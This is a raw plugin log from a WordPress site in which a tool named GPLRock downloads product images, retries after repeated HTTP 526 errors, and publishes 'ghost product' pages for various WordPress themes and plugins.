/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff42f732.jpg [05-Apr-2026 12:37:13 UTC] GPLRock: Using pre-downloaded image for product kipso-education-lms-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff42f732.jpg [05-Apr-2026 12:37:13 UTC] GPLRock: Ghost product published with image - Product ID: kipso-education-lms-wordpress-theme [05-Apr-2026 12:37:15 UTC] GPLRock: Image downloaded successfully for product outgrid-multi-purpose-elementor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5868d8f9.png [05-Apr-2026 12:37:15 UTC] GPLRock: Using pre-downloaded image for product outgrid-multi-purpose-elementor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5868d8f9.png [05-Apr-2026 12:37:15 UTC] GPLRock: Ghost product published with image - Product ID: outgrid-multi-purpose-elementor-wordpress-theme [05-Apr-2026 12:37:58 UTC] GPLRock: Image download failed for product mikado-one-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:38:00 UTC] GPLRock: Image download failed for product mikado-one-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:38:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mikado-one---multipurpose-business-wordpress-theme-26204.webp for product mikado-one-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:38:04 UTC] GPLRock: Image download failed for product mikado-one-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:38:06 UTC] GPLRock: Image download failed for product mikado-one-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:38:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mikado-one---multipurpose-business-wordpress-theme-26204.webp for product mikado-one-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:38:08 UTC] GPLRock WARNING: Image download failed for product mikado-one-multipurpose-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mikado-one---multipurpose-business-wordpress-theme-26204.webp [05-Apr-2026 12:38:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mikado-one-multipurpose-business-wordpress-theme [05-Apr-2026 12:38:08 UTC] GPLRock: Image download failed for product engin-multipurpose-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:38:10 UTC] GPLRock: Image download failed for product engin-multipurpose-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:38:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/engin---multipurpose-landing-page-wordpress-theme-18857.webp for product engin-multipurpose-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:38:12 UTC] GPLRock: Image download failed for product engin-multipurpose-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:48:13 UTC] GPLRock: Image downloaded successfully for product helion-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-092ed22e.webp [05-Apr-2026 12:48:13 UTC] GPLRock: Using pre-downloaded image for product helion-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-092ed22e.webp [05-Apr-2026 12:48:13 UTC] GPLRock: Ghost product published with image - Product ID: helion-creative-portfolio-elementor-template-kit [05-Apr-2026 12:48:14 UTC] GPLRock: Image downloaded successfully for product helfan-charity-and-nonprofit-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a08d01b1.webp [05-Apr-2026 12:48:14 UTC] GPLRock: Using pre-downloaded image for product helfan-charity-and-nonprofit-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a08d01b1.webp [05-Apr-2026 12:48:14 UTC] GPLRock: Ghost product published with image - Product ID: helfan-charity-and-nonprofit-elementor-template-kit [05-Apr-2026 12:48:16 UTC] GPLRock: Image downloaded successfully for product hekel-cyber-security-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f87df7b.webp [05-Apr-2026 12:48:16 UTC] GPLRock: Using pre-downloaded image for product hekel-cyber-security-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f87df7b.webp [05-Apr-2026 12:48:16 UTC] GPLRock: Ghost product published with image - Product ID: hekel-cyber-security-elementor-template-kit [05-Apr-2026 12:48:17 UTC] GPLRock: Image downloaded successfully for product growceries-food-grocery-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a2e3988.webp [05-Apr-2026 12:48:17 UTC] GPLRock: Using pre-downloaded image for product growceries-food-grocery-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a2e3988.webp [05-Apr-2026 12:48:17 UTC] GPLRock: Ghost product published with image - Product ID: growceries-food-grocery-store-elementor-template-kit [05-Apr-2026 12:48:19 UTC] GPLRock: Image downloaded successfully for product graha-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60540048.webp [05-Apr-2026 12:48:19 UTC] GPLRock: Using pre-downloaded image for product graha-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60540048.webp [05-Apr-2026 12:48:19 UTC] GPLRock: Ghost product published with image - Product ID: graha-real-estate-elementor-template-kit [05-Apr-2026 12:48:20 UTC] GPLRock: Image downloaded successfully for product gourmet-food-ordering-delivery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-937cdd80.webp [05-Apr-2026 12:48:20 UTC] GPLRock: Using pre-downloaded image for product gourmet-food-ordering-delivery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-937cdd80.webp [05-Apr-2026 12:48:20 UTC] GPLRock: Ghost product published with image - Product ID: gourmet-food-ordering-delivery-elementor-template-kit [05-Apr-2026 12:48:21 UTC] GPLRock: Image downloaded successfully for product gotech-online-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb6e20b2.webp [05-Apr-2026 12:48:21 UTC] GPLRock: Using pre-downloaded image for product gotech-online-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb6e20b2.webp [05-Apr-2026 12:48:21 UTC] GPLRock: Ghost product published with image - Product ID: gotech-online-course-elementor-template-kit [05-Apr-2026 12:48:23 UTC] GPLRock: Image downloaded successfully for product goovi-creative-agency-digital-marketing-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18843d0a.webp [05-Apr-2026 12:48:23 UTC] GPLRock: Using pre-downloaded image for product goovi-creative-agency-digital-marketing-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18843d0a.webp [05-Apr-2026 12:48:23 UTC] GPLRock: Ghost product published with image - Product ID: goovi-creative-agency-digital-marketing-elementor-template-kits [05-Apr-2026 12:48:24 UTC] GPLRock: Image downloaded successfully for product goodpay-fintech-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fbc12ed4.webp [05-Apr-2026 12:48:24 UTC] GPLRock: Using pre-downloaded image for product goodpay-fintech-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fbc12ed4.webp [05-Apr-2026 12:48:24 UTC] GPLRock: Ghost product published with image - Product ID: goodpay-fintech-elementor-template-kit [05-Apr-2026 12:48:33 UTC] GPLRock: Image downloaded successfully for product goodman-creative-portofolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-561b38bc.jpg [05-Apr-2026 12:48:33 UTC] GPLRock: Using pre-downloaded image for product goodman-creative-portofolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-561b38bc.jpg [05-Apr-2026 12:48:33 UTC] GPLRock: Ghost product published with image - Product ID: goodman-creative-portofolio-elementor-template-kit [05-Apr-2026 12:49:25 UTC] GPLRock: Image download failed for product post-grid-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:27 UTC] GPLRock: Image download failed for product post-grid-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-grid-for-visual-composer-5686.webp for product post-grid-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:29 UTC] GPLRock: Image download failed for product post-grid-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:31 UTC] GPLRock: Image download failed for product post-grid-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-grid-for-visual-composer-5686.webp for product post-grid-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:33 UTC] GPLRock WARNING: Image download failed for product post-grid-for-visual-composer. URL: https://meldwp.com/wp-content/uploads/post-grid-for-visual-composer-5686.webp [05-Apr-2026 12:49:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-grid-for-visual-composer [05-Apr-2026 12:49:34 UTC] GPLRock: Image download failed for product pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:36 UTC] GPLRock: Image download failed for product pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pimp-my-site---holiday-weather--festive-effects-to-pimp-your-wordpress-site-18591.webp for product pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:38 UTC] GPLRock: Image download failed for product pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:40 UTC] GPLRock: Image download failed for product pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pimp-my-site---holiday-weather--festive-effects-to-pimp-your-wordpress-site-18591.webp for product pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:42 UTC] GPLRock WARNING: Image download failed for product pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site. URL: https://meldwp.com/wp-content/uploads/pimp-my-site---holiday-weather--festive-effects-to-pimp-your-wordpress-site-18591.webp [05-Apr-2026 12:49:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pimp-my-site-holiday-weather-festive-effects-to-pimp-your-wordpress-site [05-Apr-2026 12:49:42 UTC] GPLRock: Image download failed for product woocommerce-upload-files-plugin-product-page-order-file-upload (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:44 UTC] GPLRock: Image download failed for product woocommerce-upload-files-plugin-product-page-order-file-upload (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-upload-files-plugin--product-page--order-file-upload-33343.webp for product woocommerce-upload-files-plugin-product-page-order-file-upload after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:47 UTC] GPLRock: Image download failed for product woocommerce-upload-files-plugin-product-page-order-file-upload (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:49 UTC] GPLRock: Image download failed for product woocommerce-upload-files-plugin-product-page-order-file-upload (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-upload-files-plugin--product-page--order-file-upload-33343.webp for product woocommerce-upload-files-plugin-product-page-order-file-upload after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:51 UTC] GPLRock WARNING: Image download failed for product woocommerce-upload-files-plugin-product-page-order-file-upload. URL: https://meldwp.com/wp-content/uploads/woocommerce-upload-files-plugin--product-page--order-file-upload-33343.webp [05-Apr-2026 12:49:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-upload-files-plugin-product-page-order-file-upload [05-Apr-2026 12:49:51 UTC] GPLRock: Image download failed for product silvuple-online-invitation-maker-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:53 UTC] GPLRock: Image download failed for product silvuple-online-invitation-maker-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/silvuple---online-invitation-maker-saas-19015.webp for product silvuple-online-invitation-maker-saas after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:55 UTC] GPLRock: Image download failed for product silvuple-online-invitation-maker-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:57 UTC] GPLRock: Image download failed for product silvuple-online-invitation-maker-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:49:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/silvuple---online-invitation-maker-saas-19015.webp for product silvuple-online-invitation-maker-saas after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:49:59 UTC] GPLRock WARNING: Image download failed for product silvuple-online-invitation-maker-saas. URL: https://meldwp.com/wp-content/uploads/silvuple---online-invitation-maker-saas-19015.webp [05-Apr-2026 12:49:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: silvuple-online-invitation-maker-saas [05-Apr-2026 12:50:00 UTC] GPLRock: Image download failed for product warning-old-browser-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:02 UTC] GPLRock: Image download failed for product warning-old-browser-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/warning-old-browser---wordpress-plugin-16878.webp for product warning-old-browser-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:04 UTC] GPLRock: Image download failed for product warning-old-browser-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:06 UTC] GPLRock: Image download failed for product warning-old-browser-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/warning-old-browser---wordpress-plugin-16878.webp for product warning-old-browser-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:08 UTC] GPLRock WARNING: Image download failed for product warning-old-browser-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/warning-old-browser---wordpress-plugin-16878.webp [05-Apr-2026 12:50:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: warning-old-browser-wordpress-plugin [05-Apr-2026 12:50:08 UTC] GPLRock: Image downloaded successfully for product glitch-heading-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-85ccead8.webp [05-Apr-2026 12:50:08 UTC] GPLRock: Using pre-downloaded image for product glitch-heading-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-85ccead8.webp [05-Apr-2026 12:50:08 UTC] GPLRock: Ghost product published with image - Product ID: glitch-heading-for-elementor [05-Apr-2026 12:50:08 UTC] GPLRock: Image downloaded successfully for product countdowner-countdown-timer-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d914d400.webp [05-Apr-2026 12:50:08 UTC] GPLRock: Using pre-downloaded image for product countdowner-countdown-timer-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d914d400.webp [05-Apr-2026 12:50:08 UTC] GPLRock: Ghost product published with image - Product ID: countdowner-countdown-timer-for-elementor [05-Apr-2026 12:50:08 UTC] GPLRock: Image download failed for product point-of-sale-system-for-woocommerce-pos-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:11 UTC] GPLRock: Image download failed for product point-of-sale-system-for-woocommerce-pos-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/point-of-sale-system-for-woocommerce-pos-plugin-30837.webp for product point-of-sale-system-for-woocommerce-pos-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:13 UTC] GPLRock: Image download failed for product point-of-sale-system-for-woocommerce-pos-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:15 UTC] GPLRock: Image download failed for product point-of-sale-system-for-woocommerce-pos-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/point-of-sale-system-for-woocommerce-pos-plugin-30837.webp for product point-of-sale-system-for-woocommerce-pos-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:17 UTC] GPLRock WARNING: Image download failed for product point-of-sale-system-for-woocommerce-pos-plugin. URL: https://meldwp.com/wp-content/uploads/point-of-sale-system-for-woocommerce-pos-plugin-30837.webp [05-Apr-2026 12:50:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: point-of-sale-system-for-woocommerce-pos-plugin [05-Apr-2026 12:50:17 UTC] GPLRock: Image download failed for product simple-events-calendar-js (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:19 UTC] GPLRock: Image download failed for product simple-events-calendar-js (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-events-calendar-js-2736.webp for product simple-events-calendar-js after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:21 UTC] GPLRock: Image download failed for product simple-events-calendar-js (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:23 UTC] GPLRock: Image download failed for product simple-events-calendar-js (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-events-calendar-js-2736.webp for product simple-events-calendar-js after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:26 UTC] GPLRock WARNING: Image download failed for product simple-events-calendar-js. URL: https://meldwp.com/wp-content/uploads/simple-events-calendar-js-2736.webp [05-Apr-2026 12:50:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-events-calendar-js [05-Apr-2026 12:50:26 UTC] GPLRock: Image download failed for product woocommerce-product-quantity-field-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:28 UTC] GPLRock: Image download failed for product woocommerce-product-quantity-field-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-quantity-field-plugin-21327.webp for product woocommerce-product-quantity-field-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:30 UTC] GPLRock: Image download failed for product woocommerce-product-quantity-field-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:32 UTC] GPLRock: Image download failed for product woocommerce-product-quantity-field-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:50:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-quantity-field-plugin-21327.webp for product woocommerce-product-quantity-field-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:50:34 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-quantity-field-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-quantity-field-plugin-21327.webp [05-Apr-2026 12:50:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-quantity-field-plugin [05-Apr-2026 12:50:59 UTC] GPLRock: Image download failed for product wordpress-nft-creator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:01 UTC] GPLRock: Image download failed for product wordpress-nft-creator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-nft-creator-1454.webp for product wordpress-nft-creator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:04 UTC] GPLRock: Image download failed for product wordpress-nft-creator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:06 UTC] GPLRock: Image download failed for product wordpress-nft-creator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-nft-creator-1454.webp for product wordpress-nft-creator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:08 UTC] GPLRock WARNING: Image download failed for product wordpress-nft-creator. URL: https://meldwp.com/wp-content/uploads/wordpress-nft-creator-1454.webp [05-Apr-2026 12:51:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-nft-creator [05-Apr-2026 12:51:08 UTC] GPLRock: Image downloaded successfully for product universal-full-multi-purpose-android-app (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-30f38181.webp [05-Apr-2026 12:51:08 UTC] GPLRock: Using pre-downloaded image for product universal-full-multi-purpose-android-app: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-30f38181.webp [05-Apr-2026 12:51:08 UTC] GPLRock: Ghost product published with image - Product ID: universal-full-multi-purpose-android-app [05-Apr-2026 12:51:09 UTC] GPLRock: Image download failed for product google-meet-for-latepoint (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:11 UTC] GPLRock: Image download failed for product google-meet-for-latepoint (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-meet-for-latepoint-18979.webp for product google-meet-for-latepoint after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:13 UTC] GPLRock: Image download failed for product google-meet-for-latepoint (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:15 UTC] GPLRock: Image download failed for product google-meet-for-latepoint (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-meet-for-latepoint-18979.webp for product google-meet-for-latepoint after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:17 UTC] GPLRock WARNING: Image download failed for product google-meet-for-latepoint. URL: https://meldwp.com/wp-content/uploads/google-meet-for-latepoint-18979.webp [05-Apr-2026 12:51:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: google-meet-for-latepoint [05-Apr-2026 12:51:17 UTC] GPLRock: Image download failed for product wordpress-logos-showcase-grid-and-carousel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:19 UTC] GPLRock: Image download failed for product wordpress-logos-showcase-grid-and-carousel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-logos-showcase---grid-and-carousel-17906.webp for product wordpress-logos-showcase-grid-and-carousel after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:21 UTC] GPLRock: Image download failed for product wordpress-logos-showcase-grid-and-carousel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:24 UTC] GPLRock: Image download failed for product wordpress-logos-showcase-grid-and-carousel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-logos-showcase---grid-and-carousel-17906.webp for product wordpress-logos-showcase-grid-and-carousel after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:26 UTC] GPLRock WARNING: Image download failed for product wordpress-logos-showcase-grid-and-carousel. URL: https://meldwp.com/wp-content/uploads/wordpress-logos-showcase---grid-and-carousel-17906.webp [05-Apr-2026 12:51:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-logos-showcase-grid-and-carousel [05-Apr-2026 12:51:26 UTC] GPLRock: Image download failed for product emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:28 UTC] GPLRock: Image download failed for product emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emart--multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-wit-7126.webp for product emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:30 UTC] GPLRock: Image download failed for product emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:32 UTC] GPLRock: Image download failed for product emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emart--multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-wit-7126.webp for product emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:34 UTC] GPLRock WARNING: Image download failed for product emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web. URL: https://meldwp.com/wp-content/uploads/emart--multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-wit-7126.webp [05-Apr-2026 12:51:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emart-multivendor-food-on-demand-ecommerce-parcel-taxi-booking-car-rent-app-with-admin-web [05-Apr-2026 12:51:34 UTC] GPLRock: Image download failed for product abbua-admin-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:37 UTC] GPLRock: Image download failed for product abbua-admin-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/abbua-admin-wordpress-theme-22447.webp for product abbua-admin-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:39 UTC] GPLRock: Image download failed for product abbua-admin-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:41 UTC] GPLRock: Image download failed for product abbua-admin-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/abbua-admin-wordpress-theme-22447.webp for product abbua-admin-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:43 UTC] GPLRock WARNING: Image download failed for product abbua-admin-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/abbua-admin-wordpress-theme-22447.webp [05-Apr-2026 12:51:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: abbua-admin-wordpress-theme [05-Apr-2026 12:51:43 UTC] GPLRock: Image download failed for product playlab-on-demand-movie-streaming-platform (attempt 1/3). HTTP Code: 526, 